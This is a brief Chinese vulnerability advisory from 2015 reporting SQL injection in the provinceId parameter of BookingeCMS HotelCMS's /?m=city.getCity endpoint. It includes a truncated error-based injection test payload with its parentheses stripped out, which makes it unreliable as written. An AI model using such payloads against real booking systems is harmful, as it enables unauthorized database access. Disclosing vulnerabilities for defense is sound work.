BookingeCMS HotelCMS酒店预订管理系统provinceId参数存在注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=city.getCity 文件provinceId参数存在注入 0x02 漏洞利用 测试Payload: (post提交) /?m=city.getCity provinceId=1' AND SELECT 7525 FROMSELECT COUNT,CONCAT0x7c,MIDIFNULLCASTCURRENTUSER AS...